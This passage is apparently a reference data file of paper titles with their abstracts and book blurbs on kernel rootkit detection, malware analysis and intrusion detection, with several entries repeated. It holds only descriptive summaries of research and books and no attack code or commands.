disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Copilot - a coprocessor-based kernel runtime integrity monitor paper_content: Copilot is a coprocessor-based kernel integrity monitor for commodity systems. Copilot is designed to detect malicious modifications to a host's kernel and has correctly detected the presence of 12 real-world rootkits, each within 30 seconds of their installation with less than a 1% penalty to the host's performance. Copilot requires no modifications to the protected host's software and can be expected to operate correctly even when the host kernel is thoroughly compromised - an advantage over traditional monitors designed to run on the host itself. --- paper_title: A Virtual Machine Introspection Based Architecture for Intrusion Detection paper_content: Today’s architectures for intrusion detection force the IDS designer to make a difficult choice. If the IDS resides on the host, it has an excellent view of what is happening in that host’s software, but is highly susceptible to attack. On the other hand, if the IDS resides in the network, it is more resistant to attack, but has a poor view of what is happening inside the host, making it more susceptible to evasion. In this paper we present an architecture that retains the visibility of a host-based IDS, but pulls the IDS outside of the host for greater attack resistance. We achieve this through the use of a virtual machine monitor. Using this approach allows us to isolate the IDS from the monitored host but still retain excellent visibility into the host’s state. The VMM also offers us the unique ability to completely mediate interactions between the host software and the underlying hardware. We present a detailed study of our architecture, including Livewire, a prototype implementation. We demonstrate Livewire by implementing a suite of simple intrusion detection policies and using them to detect real attacks. --- paper_title: Outside the Closed World: On Using Machine Learning for Network Intrusion Detection paper_content: In network intrusion detection research, one popular strategy for finding attacks is monitoring a network's activity for anomalies: deviations from profiles of normality previously learned from benign traffic, typically identified using tools borrowed from the machine learning community. However, despite extensive academic research one finds a striking gap in terms of actual deployments of such systems: compared with other intrusion detection approaches, machine learning is rarely employed in operational "real world" settings. We examine the differences between the network intrusion detection problem and other areas where machine learning regularly finds much more success. Our main claim is that the task of finding attacks is fundamentally different from these other applications, making it significantly harder for the intrusion detection community to employ machine learning effectively. We support this claim by identifying challenges particular to network intrusion detection, and provide a set of guidelines meant to strengthen future research on anomaly detection. --- paper_title: Rootkits: Subverting the Windows Kernel paper_content: "It's imperative that everybody working in the field of cyber-security read this book to understand the growing threat of rootkits." --Mark Russinovich, editor, Windows IT Pro / Windows & .NET Magazine"This material is not only up-to-date, it defines up-to-date. It is truly cutting-edge. As the only book on the subject, Rootkits will be of interest to any Windows security researcher or security programmer. It's detailed, well researched and the technical information is excellent. The level of technical detail, research, and time invested in developing relevant examples is impressive. In one word: Outstanding." --Tony Bautts, Security Consultant; CEO, Xtivix, Inc."This book is an essential read for anyone responsible for Windows security. Security professionals, Windows system administrators, and programmers in general will want to understand the techniques used by rootkit authors. At a time when many IT and security professionals are still worrying about the latest e-mail virus or how to get all of this month's security patches installed, Mr. Hoglund and Mr. Butler open your eyes to some of the most stealthy and significant threats to the Windows operating system. Only by understanding these offensive techniques can you properly defend the networks and systems for which you are responsible." --Jennifer Kolde, Security Consultant, Author, and Instructor"What's worse than being owned? Not knowing it. Find out what it means to be owned by reading Hoglund and Butler's first-of-a-kind book on rootkits. At the apex the malicious hacker toolset--which includes decompilers, disassemblers, fault-injection engines, kernel debuggers, payload collections, coverage tools, and flow analysis tools--is the rootkit. Beginning where Exploiting Software left off, this book shows how attackers hide in plain sight. "Rootkits are extremely powerful and are the next wave of attack technology. Like other types of malicious code, rootkits thrive on stealthiness. They hide away from standard system observers, employing hooks, trampolines, and patches to get their work done. Sophisticated rootkits run in such a way that other programs that usually monitor machine behavior can't easily detect them. A rootkit thus provides insider access only to people who know that it is running and available to accept commands. Kernel rootkits can hide files and running processes to provide a backdoor into the target machine. "Understanding the ultimate attacker's tool provides an important motivator for those of us trying to defend systems. No authors are better suited to give you a detailed hands-on understanding of rootkits than Hoglund and Butler. Better to own this book than to be owned." --Gary McGraw, Ph.D., CTO, Cigital, coauthor of Exploiting Software (2004) and Building Secure Software (2002), both from Addison-Wesley"Greg and Jamie are unquestionably the go-to experts when it comes to subverting the Windows API and creating rootkits. These two masters come together to pierce the veil of mystery surrounding rootkits, bringing this information out of the shadows. Anyone even remotely interested in security for Windows systems, including forensic analysis, should include this book very high on their must-read list." --Harlan Carvey, author of Windows Forensics and Incident Recovery (Addison-Wesley, 2005)Rootkits are the ultimate backdoor, giving hackers ongoing and virtually undetectable access to the systems they exploit. Now, two of the world's leading experts have written the first comprehensive guide to rootkits: what they are, how they work, how to build them, and how to detect them. Rootkit.com's Greg Hoglund and James Butler created and teach Black Hat's legendary course in rootkits. In this book, they reveal never-before-told offensive aspects of rootkit technology--learn how attackers can get in and stay in for years, without detection.Hoglund and Butler show exactly how to subvert the Windows XP and Windows 2000 kernels, teaching concepts that are easily applied to virtually any modern operating system, from Windows Server 2003 to Linux and UNIX. Using extensive downloadable examples, they teach rootkit programming techniques that can be used for a wide range of software, from white hat security tools to operating system drivers and debuggers.After reading this book, readers will be able to Understand the role of rootkits in remote command/control and software eavesdropping Build kernel rootkits that can make processes, files, and directories invisible Master key rootkit programming techniques, including hooking, runtime patching, and directly manipulating kernel objects Work with layered drivers to implement keyboard sniffers and file filters Detect rootkits and build host-based intrusion prevention software that resists rootkit attacksVisit rootkit.com for code and programs from this book. The site also contains enhancements to the book's text, such as up-to-the-minute information on rootkits available nowhere else. --- paper_title: Modern Operating Systems paper_content: For software development professionals and computer science students, Modern Operating Systems gives a solid conceptual overview of operating system design, including detailed case studies of Unix/Linux and Windows 2000. What makes an operating system modern? According to author Andrew Tanenbaum, it is the awareness of high-demand computer applications--primarily in the areas of multimedia, parallel and distributed computing, and security. The development of faster and more advanced hardware has driven progress in software, including enhancements to the operating system. It is one thing to run an old operating system on current hardware, and another to effectively leverage current hardware to best serve modern software applications. If you don't believe it, install Windows 3.0 on a modern PC and try surfing the Internet or burning a CD. Readers familiar with Tanenbaum's previous text, Operating Systems, know the author is a great proponent of simple design and hands-on experimentation. His earlier book came bundled with the source code for an operating system called Minux, a simple variant of Unix and the platform used by Linus Torvalds to develop Linux. Although this book does not come with any source code, he illustrates many of his points with code fragments (C, usually with Unix system calls). The first half of Modern Operating Systems focuses on traditional operating systems concepts: processes, deadlocks, memory management, I/O, and file systems. There is nothing groundbreaking in these early chapters, but all topics are well covered, each including sections on current research and a set of student problems. It is enlightening to read Tanenbaum's explanations of the design decisions made by past operating systems gurus, including his view that additional research on the problem of deadlocks is impractical except for "keeping otherwise unemployed graph theorists off the streets." It is the second half of the book that differentiates itself from older operating systems texts. Here, each chapter describes an element of what constitutes a modern operating system--awareness of multimedia applications, multiple processors, computer networks, and a high level of security. The chapter on multimedia functionality focuses on such features as handling massive files and providing video-on-demand. Included in the discussion on multiprocessor platforms are clustered computers and distributed computing. Finally, the importance of security is discussed--a lively enumeration of the scores of ways operating systems can be vulnerable to attack, from password security to computer viruses and Internet worms. Included at the end of the book are case studies of two popular operating systems: Unix/Linux and Windows 2000. There is a bias toward the Unix/Linux approach, not surprising given the author's experience and academic bent, but this bias does not detract from Tanenbaum's analysis. Both operating systems are dissected, describing how each implements processes, file systems, memory management, and other operating system fundamentals. Tanenbaum's mantra is simple, accessible operating system design. Given that modern operating systems have extensive features, he is forced to reconcile physical size with simplicity. Toward this end, he makes frequent references to the Frederick Brooks classic The Mythical Man-Month for wisdom on managing large, complex software development projects. He finds both Windows 2000 and Unix/Linux guilty of being too complicated--with a particular skewering of Windows 2000 and its "mammoth Win32 API." A primary culprit is the attempt to make operating systems more "user-friendly," which Tanenbaum views as an excuse for bloated code. The solution is to have smart people, the smallest possible team, and well-defined interactions between various operating systems components. Future operating system design will benefit if the advice in this book is taken to heart. --Pete Ostenson --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Detecting stealth software with Strider GhostBuster paper_content: Stealth malware programs that silently infect enterprise and consumer machines are becoming a major threat to the future of the Internet. Resource hiding is a powerful stealth technique commonly used by malware to evade detection by computer users and anti-malware scanners. In this paper, we focus on a subclass of malware, termed "ghostware", which hide files, configuration settings, processes, and loaded modules from the operating system's query and enumeration application programming interfaces (APIs). Instead of targeting individual stealth implementations, we describe a systematic framework for detecting multiple types of hidden resources by leveraging the hiding behavior as a detection mechanism. Specifically, we adopt a cross-view diff-based approach to ghostware detection by comparing a high-level infected scan with a low-level clean scan and alternatively comparing an inside-the-box infected scan with an outside-the-box clean scan. We describe the design and implementation of the Strider GhostBuster tool and demonstrate its efficiency and effectiveness in detecting resources hidden by real-world malware such as rootkits, Trojans, and key-loggers. --- paper_title: An architecture for specification-based detection of semantic integrity violations in kernel dynamic data paper_content: The ability of intruders to hide their presence in compromised systems has surpassed the ability of the current generation of integrity monitors to detect them. Once in control of a system, intruders modify the state of constantly-changing dynamic kernel data structures to hide their processes and elevate their privileges. Current monitoring tools are limited to detecting changes in nominally static kernel data and text and cannot distinguish a valid state change from tampering in these dynamic data structures. We introduce a novel general architecture for defining and monitoring semantic integrity constraints using a specification language-based approach. This approach will enable a new generation of integrity monitors to distinguish valid states from tampering. --- paper_title: Copilot - a coprocessor-based kernel runtime integrity monitor paper_content: Copilot is a coprocessor-based kernel integrity monitor for commodity systems. Copilot is designed to detect malicious modifications to a host's kernel and has correctly detected the presence of 12 real-world rootkits, each within 30 seconds of their installation with less than a 1% penalty to the host's performance. Copilot requires no modifications to the protected host's software and can be expected to operate correctly even when the host kernel is thoroughly compromised - an advantage over traditional monitors designed to run on the host itself. --- paper_title: Detecting Kernel-Level Rootkits Using Data Structure Invariants paper_content: Rootkits affect system security by modifying kernel data structures to achieve a variety of malicious goals. While early rootkits modified control data structures, such as the system call table and values of function pointers, recent work has demonstrated rootkits that maliciously modify noncontrol data. Most prior techniques for rootkit detection have focused solely on detecting control data modifications and, therefore, fail to detect such rootkits. This paper presents a novel technique to detect rootkits that modify both control and noncontrol data. The main idea is to externally observe the execution of the kernel during an inference phase and hypothesize invariants on kernel data structures. A rootkit detection phase uses these invariants as specifications of data structure integrity. During this phase, violation of invariants indicates an infection. We have implemented Gibraltar, a prototype tool that infers kernel data structure invariants and uses them to detect rootkits. Experiments show that Gibraltar can effectively detect previously known rootkits, including those that modify noncontrol data structures. --- paper_title: Copilot - a coprocessor-based kernel runtime integrity monitor paper_content: Copilot is a coprocessor-based kernel integrity monitor for commodity systems. Copilot is designed to detect malicious modifications to a host's kernel and has correctly detected the presence of 12 real-world rootkits, each within 30 seconds of their installation with less than a 1% penalty to the host's performance. Copilot requires no modifications to the protected host's software and can be expected to operate correctly even when the host kernel is thoroughly compromised - an advantage over traditional monitors designed to run on the host itself. --- paper_title: A survey of data mining techniques for malware detection using file features paper_content: This paper presents a survey of data mining techniques for malware detection using file features. The techniques are categorized based upon a three tier hierarchy that includes file features, analysis type and detection type. File features are the features extracted from binary programs, analysis type is either static or dynamic, and the detection type is borrowed from intrusion detection as either misuse or anomaly detection. It provides the reader with the major advancement in the malware research using data mining on file features and categorizes the surveyed work based upon the above stated hierarchy. This served as the major contribution of this paper. --- paper_title: Robust signatures for kernel data structures paper_content: Kernel-mode rootkits hide objects such as processes and threads using a technique known as Direct Kernel Object Manipulation (DKOM). Many forensic analysis tools attempt to detect these hidden objects by scanning kernel memory with handmade signatures; however, such signatures are brittle and rely on non-essential features of these data structures, making them easy to evade. In this paper, we present an automated mechanism for generating signatures for kernel data structures and show that these signatures are robust: attempts to evade the signature by modifying the structure contents will cause the OS to consider the object invalid. Using dynamic analysis, we profile the target data structure to determine commonly used fields, and we then fuzz those fields to determine which are essential to the correct operation of the OS. These fields form the basis of a signature for the data structure. In our experiments, our new signature matched the accuracy of existing scanners for traditional malware and found processes hidden with our prototype rootkit that all current signatures missed. Our techniques significantly increase the difficulty of hiding objects from signature scanning. --- paper_title: Operating System Interface Obfuscation and the Revealing of Hidden Operations paper_content: Many software security solutions--including malware analyzers, information flow tracking systems, auditing utilities, and host-based intrusion detectors--rely on knowledge of standard system call interfaces to reason about process execution behavior. In this work, we show how a rootkit can obfuscate a commodity kernel's system call interfaces to degrade the effectiveness of these tools. Our attack, called Illusion, allows user-level malware to invoke privileged kernel operations without requiring the malware to call the actual system calls corresponding to the operations. The Illusion interface hides system operations from user-, kernel-, and hypervisor-level monitors mediating the conventional system-call interface. Illusion alters neither static kernel code nor read-only dispatch tables, remaining elusive from tools protecting kernel memory. We then consider the problem of Illusion attacks and augment system call data with kernel-level execution information to expose the hidden kernel operations. We present a Xen-based monitoring system, Sherlock, that adds kernel execution watchpoints to the stream of system calls. Sherlock automatically adapts its sensitivity based on security requirements to remain performant on desktop systems: in normal execution, it adds 1% to 10% overhead to a variety of workloads. --- paper_title: Guest-Transparent Prevention of Kernel Rootkits with VMM-based Memory Shadowing paper_content: Kernel rootkits pose a significant threat to computer systems as they run at the highest privilege level and have unrestricted access to the resources of their victims. Many current efforts in kernel rootkit defense focus on the detectionof kernel rootkits --- after a rootkit attack has taken place, while the smaller number of efforts in kernel rootkit preventionexhibit limitations in their capability or deployability. In this paper we present a kernel rootkit prevention system called NICKLE which addresses a common, fundamental characteristic of most kernel rootkits: the need for executing their own kernel code. NICKLE is a lightweight, virtual machine monitor (VMM) based system that transparently prevents unauthorized kernel code execution for unmodified commodity (guest) OSes. NICKLE is based on a new scheme called memory shadowing, wherein the trusted VMM maintains a shadow physical memory for a running VM and performs real-time kernel code authentication so that only authenticated kernel code will be stored in the shadow memory. Further, NICKLE transparently routes guest kernel instruction fetches to the shadow memory at runtime. By doing so, NICKLE guarantees that only the authenticated kernel code will be executed, foiling the kernel rootkit's attempt to strike in the first place. We have implemented NICKLE in three VMM platforms: QEMU+KQEMU, VirtualBox, and VMware Workstation. Our experiments with 23 real-world kernel rootkits targeting the Linux or Windows OSes demonstrate NICKLE's effectiveness. Furthermore, our performance evaluation shows that NICKLE introduces small overhead to the VMM platform. --- paper_title: SecVisor: a tiny hypervisor to provide lifetime kernel code integrity for commodity OSes paper_content: We propose SecVisor, a tiny hypervisor that ensures code integrity for commodity OS kernels. In particular, SecVisor ensures that only user-approved code can execute in kernel mode over the entire system lifetime. This protects the kernel against code injection attacks, such as kernel rootkits. SecVisor can achieve this propertyeven against an attacker who controls everything but the CPU, the memory controller, and system memory chips. Further, SecVisor can even defend against attackers with knowledge of zero-day kernel exploits. Our goal is to make SecVisor amenable to formal verificationand manual audit, thereby making it possible to rule out known classes of vulnerabilities. To this end, SecVisor offers small code size and small external interface. We rely on memory virtualization to build SecVisor and implement two versions, one using software memory virtualization and the other using CPU-supported memory virtualization. The code sizes of the runtime portions of these versions are 1739 and 1112 lines, respectively. The size of the external interface for both versions of SecVisor is 2 hypercalls. It is easy to port OS kernels to SecVisor. We port the Linux kernel version 2.6.20 by adding 12 lines and deleting 81 lines, out of a total of approximately 4.3 million lines of code in the kernel. --- paper_title: Automatic placement of authorization hooks in the linux security modules framework paper_content: We present a technique for automatic placement of authorization hooks, and apply it to the Linux security modules (LSM) framework. LSM is a generic framework which allows diverse authorization policies to be enforced by the Linux kernel. It consists of a kernel module which encapsulates an authorization policy, and hooks into the kernel module placed at appropriate locations in the Linux kernel. The kernel enforces the authorization policy using hook calls. In current practice, hooks are placed manually in the kernel. This approach is tedious, and as prior work has shown, is prone to security holes.Our technique uses static analysis of the Linux kernel and the kernel module to automate hook placement. Given a non-hook-placed version of the Linux kernel, and a kernel module that implements an authorization policy, our technique infers the set of operations authorized by each hook, and the set of operations performed by each function in the kernel. It uses this information to infer the set of hooks that must guard each kernel function. We describe the design and implementation of a prototype tool called T AHOE (Tool for Authorization Hook Placement) that uses this technique. We demonstrate the effectiveness of T AHOE by using it with the LSM implementation of security-enhanced Linux (selinux). While our exposition in this paper focuses on hook placement for LSM, our technique can be used to place hooks in other LSM-like architectures as well. --- paper_title: Multi-aspect profiling of kernel rootkit behavior paper_content: Kernel rootkits, malicious software designed to compromise a running operating system kernel, are difficult to analyze and profile due to their elusive nature, the variety and complexity of their behavior, and the privilege level at which they run. However, a comprehensive kernel rootkit profile that reveals key aspects of the rootkit's behavior is helpful in aiding a detailed manual analysis by a human expert. In this paper we present PoKeR, a kernel rootkit profiler capable of producing multi-aspect rootkit profiles which include the revelation of rootkit hooking behavior, the exposure of targeted kernel objects (both static and dynamic), assessment of user-level impacts, as well as the extraction of kernel rootkit code. The system is designed to be deployed in scenarios which can tolerate high overheads, such as honeypots. Our evaluation results with a number of real-world kernel rootkits show that PoKeR is able to accurately profile a variety of rootkits ranging from traditional ones with system call hooking to more advanced ones with direct kernel object manipulation. The obtained profiles lead to unique insights into the rootkits' characteristics and demonstrate PoKeR's usefulness as a tool for rootkit investigators. --- paper_title: A Virtual Machine Introspection Based Architecture for Intrusion Detection paper_content: Today’s architectures for intrusion detection force the IDS designer to make a difficult choice. If the IDS resides on the host, it has an excellent view of what is happening in that host’s software, but is highly susceptible to attack. On the other hand, if the IDS resides in the network, it is more resistant to attack, but has a poor view of what is happening inside the host, making it more susceptible to evasion. In this paper we present an architecture that retains the visibility of a host-based IDS, but pulls the IDS outside of the host for greater attack resistance. We achieve this through the use of a virtual machine monitor. Using this approach allows us to isolate the IDS from the monitored host but still retain excellent visibility into the host’s state. The VMM also offers us the unique ability to completely mediate interactions between the host software and the underlying hardware. We present a detailed study of our architecture, including Livewire, a prototype implementation. We demonstrate Livewire by implementing a suite of simple intrusion detection policies and using them to detect real attacks. --- paper_title: Valgrind: a framework for heavyweight dynamic binary instrumentation paper_content: Dynamic binary instrumentation (DBI) frameworks make it easy to build dynamic binary analysis (DBA) tools such as checkers and profilers. Much of the focus on DBI frameworks has been on performance; little attention has been paid to their capabilities. As a result, we believe the potential of DBI has not been fully exploited. In this paper we describe Valgrind, a DBI framework designed for building heavyweight DBA tools. We focus on its unique support for shadow values-a powerful but previously little-studied and difficult-to-implement DBA technique, which requires a tool to shadow every register and memory value with another value that describes it. This support accounts for several crucial design features that distinguish Valgrind from other DBI frameworks. Because of these features, lightweight tools built with Valgrind run comparatively slowly, but Valgrind can be used to build more interesting, heavyweight tools that are difficult or impossible to build with other DBI frameworks such as Pin and DynamoRIO. --- paper_title: Operating System Interface Obfuscation and the Revealing of Hidden Operations paper_content: Many software security solutions--including malware analyzers, information flow tracking systems, auditing utilities, and host-based intrusion detectors--rely on knowledge of standard system call interfaces to reason about process execution behavior. In this work, we show how a rootkit can obfuscate a commodity kernel's system call interfaces to degrade the effectiveness of these tools. Our attack, called Illusion, allows user-level malware to invoke privileged kernel operations without requiring the malware to call the actual system calls corresponding to the operations. The Illusion interface hides system operations from user-, kernel-, and hypervisor-level monitors mediating the conventional system-call interface. Illusion alters neither static kernel code nor read-only dispatch tables, remaining elusive from tools protecting kernel memory. We then consider the problem of Illusion attacks and augment system call data with kernel-level execution information to expose the hidden kernel operations. We present a Xen-based monitoring system, Sherlock, that adds kernel execution watchpoints to the stream of system calls. Sherlock automatically adapts its sensitivity based on security requirements to remain performant on desktop systems: in normal execution, it adds 1% to 10% overhead to a variety of workloads. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: DroidAnalyst: Synergic App Framework for Static and Dynamic App Analysis paper_content: Evolution of mobile devices, availability of additional resources coupled with enhanced functionality has leveraged smartphone to substitute the conventional computing devices. Mobile device users have adopted smartphones for online payments, sending emails, social networking, and stores the user sensitive information. The ever increasing mobile devices has attracted malware authors and cybercriminals to target mobile platforms. Android, the most popular open source mobile OS is being targeted by the malware writers. In particular, less monitored third party markets are being used as infection and propagation sources. Given the threats posed by the increasing number of malicious apps, security researchers must be able to analyze the malware quickly and efficiently; this may not be feasible with the manual analysis. Hence, automated analysis techniques for app vetting and malware detection are necessary. In this chapter, we present DroidAnalyst, a novel automated app vetting and malware analysis framework that integrates the synergy of static and dynamic analysis to improve accuracy and efficiency of analysis. DroidAnalyst generates a unified analysis model that combines the strengths of the complementary approaches with multiple detection methods, to increase the app code analysis. We have evaluated our proposed solution DroidAnalyst against a reasonable dataset consisting real-world benign and malware apps. --- paper_title: Detecting and classifying method based on similarity matching of Android malware behavior with profile paper_content: AbstractMass-market mobile security threats have increased ::: recently due to the growth of mobile technologies and the popularity of mobile devices. Accordingly, techniques have been introduced for identifying, classifying, and defending against mobile threats utilizing static, dynamic, on-device, and off-device techniques. Static techniques are easy to evade, while dynamic techniques are expensive. On-device techniques are evasion, while off-device techniques need being always online. To address some of those shortcomings, we introduce Andro-profiler, a hybrid behavior based analysis and classification system for mobile malware. Andro-profiler main goals are efficiency, scalability, and accuracy. For that, Andro-profiler classifies malware by exploiting the behavior profiling extracted from the integrated system logs including system calls. Andro-profiler executes a malicious application on an emulator in order to generate the integrated system logs, and creates human-readable behavior profiles by analyzing the integrated system logs. By comparing the behavior profile of malicious application with representative behavior profile for each malware family using a weighted similarity matching technique, Andro-profiler detects and classifies it into malware families. The experiment results demonstrate that Andro-profiler is scalable, performs well in detecting and classifying malware with accuracy greater than 98 %, outperforms the existing state-of-the-art work, and is capable of identifying 0-day mobile malware samples. --- paper_title: Searching for processes and threads in Microsoft Windows memory dumps paper_content: Current tools to analyze memory dumps of systems running Microsoft Windows usually build on the concept of enumerating lists maintained by the kernel to keep track of processes, threads and other objects. Therefore they will frequently fail to detect objects that are already terminated or which have been hidden by Direct Kernel Object Manipulation techniques. This article analyzes the in-memory structures which represent processes and threads. It develops search patterns which will then be used to scan the whole memory dump for traces of said objects, independent from the aforementioned lists. As demonstrated by a proof-of-concept implementation this approach could reveal hidden and terminated processes and threads, under some circumstances even after the system under examination has been rebooted. --- paper_title: Detecting Kernel-Level Rootkits Using Data Structure Invariants paper_content: Rootkits affect system security by modifying kernel data structures to achieve a variety of malicious goals. While early rootkits modified control data structures, such as the system call table and values of function pointers, recent work has demonstrated rootkits that maliciously modify noncontrol data. Most prior techniques for rootkit detection have focused solely on detecting control data modifications and, therefore, fail to detect such rootkits. This paper presents a novel technique to detect rootkits that modify both control and noncontrol data. The main idea is to externally observe the execution of the kernel during an inference phase and hypothesize invariants on kernel data structures. A rootkit detection phase uses these invariants as specifications of data structure integrity. During this phase, violation of invariants indicates an infection. We have implemented Gibraltar, a prototype tool that infers kernel data structure invariants and uses them to detect rootkits. Experiments show that Gibraltar can effectively detect previously known rootkits, including those that modify noncontrol data structures. --- paper_title: Shredding your garbage: Reducing data lifetime through secure deallocation paper_content: Today's operating systems, word processors, web browsers, and other common software take no measures to promptly remove data from memory. Consequently, sensitive data, such as passwords, social security numbers, and confidential documents, often remains in memory indefinitely, significantly increasing the risk of exposure. ::: ::: We present a strategy for reducing the lifetime of data in memory called secure deallocation. With secure deal-location we zero data either at deallocation or within a short, predictable period afterward in general system allocators (e.g. user heap, user stack, kernel heap). This substantially reduces data lifetime with minimal implementation effort, negligible overhead, and without modifying existing applications. ::: ::: We demonstrate that secure deallocation generally clears data immediately after its last use, and that without such measures, data can remain in memory for days or weeks, even persisting across reboots. We further show that secure deallocation promptly eliminates sensitive data in a variety of important real world applications. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: A survey of data mining techniques for malware detection using file features paper_content: This paper presents a survey of data mining techniques for malware detection using file features. The techniques are categorized based upon a three tier hierarchy that includes file features, analysis type and detection type. File features are the features extracted from binary programs, analysis type is either static or dynamic, and the detection type is borrowed from intrusion detection as either misuse or anomaly detection. It provides the reader with the major advancement in the malware research using data mining on file features and categorizes the surveyed work based upon the above stated hierarchy. This served as the major contribution of this paper. --- paper_title: Robust signatures for kernel data structures paper_content: Kernel-mode rootkits hide objects such as processes and threads using a technique known as Direct Kernel Object Manipulation (DKOM). Many forensic analysis tools attempt to detect these hidden objects by scanning kernel memory with handmade signatures; however, such signatures are brittle and rely on non-essential features of these data structures, making them easy to evade. In this paper, we present an automated mechanism for generating signatures for kernel data structures and show that these signatures are robust: attempts to evade the signature by modifying the structure contents will cause the OS to consider the object invalid. Using dynamic analysis, we profile the target data structure to determine commonly used fields, and we then fuzz those fields to determine which are essential to the correct operation of the OS. These fields form the basis of a signature for the data structure. In our experiments, our new signature matched the accuracy of existing scanners for traditional malware and found processes hidden with our prototype rootkit that all current signatures missed. Our techniques significantly increase the difficulty of hiding objects from signature scanning. --- paper_title: New malicious code detection using variable length n-grams paper_content: Most of the commercial antivirus software fail to detect unknown and new malicious code. In order to handle this problem generic virus detection is a viable option. Generic virus detector needs features that are common to viruses. Recently Kolter et al. [16] propose an efficient generic virus detector using n-grams as features. The fixed length n-grams used there suffer from the drawback that they cannot capture meaningful sequences of different lengths. In this paper we propose a new method of variable-length n-grams extraction based on the concept of episodes and demonstrate that they outperform fixed length n-grams in malicious code detection. The proposed algorithm requires only two scans over the whole data set whereas most of the classical algorithms require scans proportional to the maximum length of n-grams. --- paper_title: Information flow control for standard OS abstractions paper_content: Decentralized Information Flow Control (DIFC) is an approach to security that allows application writers to control how data flows between the pieces of an application and the outside world. As applied to privacy, DIFC allows untrusted software to compute with private data while trusted security code controls the release of that data. As applied to integrity, DIFC allows trusted code to protect untrusted software from unexpected malicious inputs. In either case, only bugs in the trusted code, which tends to be small and isolated, can lead to security violations. We present Flume, a new DIFC model that applies at the granularity of operating system processes and standard OS abstractions (e.g., pipes and file descriptors). Flume was designed for simplicity of mechanism, to ease DIFC's use in existing applications, and to allow safe interaction between conventional and DIFC-aware processes. Flume runs as a user-level reference monitor onLinux. A process confined by Flume cannot perform most system calls directly; instead, an interposition layer replaces system calls with IPCto the reference monitor, which enforces data flowpolicies and performs safe operations on the process's behalf. We ported a complex web application (MoinMoin Wiki) to Flume, changingonly 2% of the original code. Performance measurements show a 43% slowdown on read workloadsand a 34% slowdown on write workloads, which aremostly due to Flume's user-level implementation. --- paper_title: A sense of self for Unix processes paper_content: A method for anomaly detection is introduced in which ``normal'' is defined by short-range correlations in a process' system calls. Initial experiments suggest that the definition is stable during normal behavior for standard UNIX programs. Further, it is able to detect several common intrusions involving sendmail and lpr. This work is 